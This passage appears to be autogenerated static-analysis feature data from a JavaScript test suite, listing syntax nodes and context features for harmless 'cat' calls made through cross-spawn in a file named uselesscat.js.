autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:153:29:153:31 | err | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:153:29:153:31 | err | contextSurroundingFunctionParameters | (err, out) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:153:29:153:31 | err | enclosingFunctionBody | err out console log out | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:153:29:153:31 | err | enclosingFunctionName | cspawn#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:153:29:153:31 | err | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:153:34:153:36 | out | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:153:34:153:36 | out | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:153:34:153:36 | out | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:153:34:153:36 | out | contextSurroundingFunctionParameters | (err, out) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:153:34:153:36 | out | enclosingFunctionBody | err out console log out | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:153:34:153:36 | out | enclosingFunctionBody | err out console log out | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:153:34:153:36 | out | enclosingFunctionName | cspawn#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:153:34:153:36 | out | enclosingFunctionName | cspawn#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:153:34:153:36 | out | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:153:34:153:36 | out | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:153:43:153:49 | console | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:153:43:153:49 | console | contextSurroundingFunctionParameters | (err, out) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:153:43:153:49 | console | enclosingFunctionBody | err out console log out | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:153:43:153:49 | console | enclosingFunctionName | cspawn#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:153:43:153:49 | console | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:153:43:153:53 | console.log | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:153:43:153:53 | console.log | contextSurroundingFunctionParameters | (err, out) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:153:43:153:53 | console.log | enclosingFunctionBody | err out console log out | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:153:43:153:53 | console.log | enclosingFunctionName | cspawn#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:153:43:153:53 | console.log | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:153:43:153:58 | console.log(out) | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:153:43:153:58 | console.log(out) | contextSurroundingFunctionParameters | (err, out) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:153:43:153:58 | console.log(out) | enclosingFunctionBody | err out console log out | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:153:43:153:58 | console.log(out) | enclosingFunctionName | cspawn#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:153:43:153:58 | console.log(out) | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:153:43:153:58 | exceptional return of console.log(out) | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:153:43:153:58 | exceptional return of console.log(out) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:153:43:153:58 | exceptional return of console.log(out) | enclosingFunctionBody | err out console log out | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:153:43:153:58 | exceptional return of console.log(out) | enclosingFunctionName | cspawn#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:153:43:153:58 | exceptional return of console.log(out) | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:153:51:153:53 | log | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:153:51:153:53 | log | contextSurroundingFunctionParameters | (err, out) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:153:51:153:53 | log | enclosingFunctionBody | err out console log out | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:153:51:153:53 | log | enclosingFunctionName | cspawn#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:153:51:153:53 | log | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:153:55:153:57 | out | CalleeFlexibleAccessPath | console.log | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:153:55:153:57 | out | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:153:55:153:57 | out | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:153:55:153:57 | out | contextSurroundingFunctionParameters | (err, out) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:153:55:153:57 | out | enclosingFunctionBody | err out console log out | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:153:55:153:57 | out | enclosingFunctionName | cspawn#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:153:55:153:57 | out | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:153:55:153:57 | out | receiverName | console | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:154:1:154:6 | cspawn | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:154:1:154:6 | cspawn | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:154:1:154:6 | cspawn | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:154:1:154:26 | cspawn( ... /bar']) | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:154:1:154:26 | cspawn( ... /bar']) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:154:1:154:26 | cspawn( ... /bar']) | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:154:1:154:26 | exceptional return of cspawn( ... /bar']) | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:154:1:154:26 | exceptional return of cspawn( ... /bar']) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:154:1:154:26 | exceptional return of cspawn( ... /bar']) | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:154:8:154:12 | 'cat' | CalleeFlexibleAccessPath | cspawn | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:154:8:154:12 | 'cat' | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:154:8:154:12 | 'cat' | calleeImports | cross-spawn | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:154:8:154:12 | 'cat' | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:154:8:154:12 | 'cat' | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:154:8:154:12 | 'cat' | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:154:15:154:25 | ['foo/bar'] | CalleeFlexibleAccessPath | cspawn | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:154:15:154:25 | ['foo/bar'] | InputArgumentIndex | 1 | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:154:15:154:25 | ['foo/bar'] | calleeImports | cross-spawn | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:154:15:154:25 | ['foo/bar'] | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:154:15:154:25 | ['foo/bar'] | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:154:15:154:25 | ['foo/bar'] | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:154:16:154:24 | 'foo/bar' | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:154:16:154:24 | 'foo/bar' | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:154:16:154:24 | 'foo/bar' | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:154:16:154:24 | 'foo/bar' | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:154:16:154:24 | 'foo/bar' | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:154:16:154:24 | 'foo/bar' | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:155:1:155:6 | cspawn | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:155:1:155:6 | cspawn | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:155:1:155:6 | cspawn | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:155:1:155:47 | cspawn( ... (out)}) | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:155:1:155:47 | cspawn( ... (out)}) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:155:1:155:47 | cspawn( ... (out)}) | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:155:1:155:47 | exceptional return of cspawn( ... (out)}) | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:155:1:155:47 | exceptional return of cspawn( ... (out)}) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:155:1:155:47 | exceptional return of cspawn( ... (out)}) | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:155:8:155:12 | 'cat' | CalleeFlexibleAccessPath | cspawn | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:155:8:155:12 | 'cat' | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:155:8:155:12 | 'cat' | calleeImports | cross-spawn | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:155:8:155:12 | 'cat' | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:155:8:155:12 | 'cat' | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:155:8:155:12 | 'cat' | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:155:15:155:46 | 'arguments' object of anonymous function | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:155:15:155:46 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:155:15:155:46 | 'arguments' object of anonymous function | enclosingFunctionBody | err out console log out | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:155:15:155:46 | 'arguments' object of anonymous function | enclosingFunctionName | cspawn#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:155:15:155:46 | 'arguments' object of anonymous function | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:155:15:155:46 | (err, o ... g(out)} | CalleeFlexibleAccessPath | cspawn | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:155:15:155:46 | (err, o ... g(out)} | InputArgumentIndex | 1 | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:155:15:155:46 | (err, o ... g(out)} | calleeImports | cross-spawn | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:155:15:155:46 | (err, o ... g(out)} | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:155:15:155:46 | (err, o ... g(out)} | contextSurroundingFunctionParameters | (err, out) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:155:15:155:46 | (err, o ... g(out)} | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:155:15:155:46 | exceptional return of anonymous function | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:155:15:155:46 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:155:15:155:46 | exceptional return of anonymous function | enclosingFunctionBody | err out console log out | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:155:15:155:46 | exceptional return of anonymous function | enclosingFunctionName | cspawn#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:155:15:155:46 | exceptional return of anonymous function | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:155:15:155:46 | return of anonymous function | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:155:15:155:46 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:155:15:155:46 | return of anonymous function | enclosingFunctionBody | err out console log out | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:155:15:155:46 | return of anonymous function | enclosingFunctionName | cspawn#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:155:15:155:46 | return of anonymous function | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:155:16:155:18 | err | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:155:16:155:18 | err | contextSurroundingFunctionParameters | (err, out) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:155:16:155:18 | err | enclosingFunctionBody | err out console log out | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:155:16:155:18 | err | enclosingFunctionName | cspawn#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:155:16:155:18 | err | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:155:21:155:23 | out | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:155:21:155:23 | out | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:155:21:155:23 | out | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:155:21:155:23 | out | contextSurroundingFunctionParameters | (err, out) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:155:21:155:23 | out | enclosingFunctionBody | err out console log out | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:155:21:155:23 | out | enclosingFunctionBody | err out console log out | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:155:21:155:23 | out | enclosingFunctionName | cspawn#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:155:21:155:23 | out | enclosingFunctionName | cspawn#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:155:21:155:23 | out | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:155:21:155:23 | out | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:155:30:155:36 | console | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:155:30:155:36 | console | contextSurroundingFunctionParameters | (err, out) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:155:30:155:36 | console | enclosingFunctionBody | err out console log out | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:155:30:155:36 | console | enclosingFunctionName | cspawn#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:155:30:155:36 | console | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:155:30:155:40 | console.log | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:155:30:155:40 | console.log | contextSurroundingFunctionParameters | (err, out) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:155:30:155:40 | console.log | enclosingFunctionBody | err out console log out | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:155:30:155:40 | console.log | enclosingFunctionName | cspawn#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:155:30:155:40 | console.log | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:155:30:155:45 | console.log(out) | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:155:30:155:45 | console.log(out) | contextSurroundingFunctionParameters | (err, out) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:155:30:155:45 | console.log(out) | enclosingFunctionBody | err out console log out | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:155:30:155:45 | console.log(out) | enclosingFunctionName | cspawn#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:155:30:155:45 | console.log(out) | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:155:30:155:45 | exceptional return of console.log(out) | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:155:30:155:45 | exceptional return of console.log(out) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:155:30:155:45 | exceptional return of console.log(out) | enclosingFunctionBody | err out console log out | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:155:30:155:45 | exceptional return of console.log(out) | enclosingFunctionName | cspawn#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:155:30:155:45 | exceptional return of console.log(out) | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:155:38:155:40 | log | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:155:38:155:40 | log | contextSurroundingFunctionParameters | (err, out) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:155:38:155:40 | log | enclosingFunctionBody | err out console log out | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:155:38:155:40 | log | enclosingFunctionName | cspawn#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:155:38:155:40 | log | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:155:42:155:44 | out | CalleeFlexibleAccessPath | console.log | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:155:42:155:44 | out | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:155:42:155:44 | out | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:155:42:155:44 | out | contextSurroundingFunctionParameters | (err, out) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:155:42:155:44 | out | enclosingFunctionBody | err out console log out | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:155:42:155:44 | out | enclosingFunctionName | cspawn#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:155:42:155:44 | out | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:155:42:155:44 | out | receiverName | console | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:156:1:156:6 | cspawn | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:156:1:156:6 | cspawn | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:156:1:156:6 | cspawn | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:156:1:156:35 | cspawn( ... tf8' }) | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:156:1:156:35 | cspawn( ... tf8' }) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:156:1:156:35 | cspawn( ... tf8' }) | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:156:1:156:35 | exceptional return of cspawn( ... tf8' }) | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:156:1:156:35 | exceptional return of cspawn( ... tf8' }) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:156:1:156:35 | exceptional return of cspawn( ... tf8' }) | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:156:8:156:12 | 'cat' | CalleeFlexibleAccessPath | cspawn | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:156:8:156:12 | 'cat' | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:156:8:156:12 | 'cat' | calleeImports | cross-spawn | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:156:8:156:12 | 'cat' | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:156:8:156:12 | 'cat' | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:156:8:156:12 | 'cat' | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:156:15:156:34 | { encoding: 'utf8' } | CalleeFlexibleAccessPath | cspawn | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:156:15:156:34 | { encoding: 'utf8' } | InputArgumentIndex | 1 | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:156:15:156:34 | { encoding: 'utf8' } | calleeImports | cross-spawn | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:156:15:156:34 | { encoding: 'utf8' } | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:156:15:156:34 | { encoding: 'utf8' } | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:156:15:156:34 | { encoding: 'utf8' } | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:156:17:156:24 | encoding | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:156:17:156:24 | encoding | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:156:17:156:24 | encoding | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:156:17:156:32 | encoding: 'utf8' | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:156:17:156:32 | encoding: 'utf8' | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:156:17:156:32 | encoding: 'utf8' | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:156:17:156:32 | encoding: 'utf8' | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:156:17:156:32 | encoding: 'utf8' | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:156:17:156:32 | encoding: 'utf8' | fileImports | child_process cross-spawn exec express fs shelljs | +| 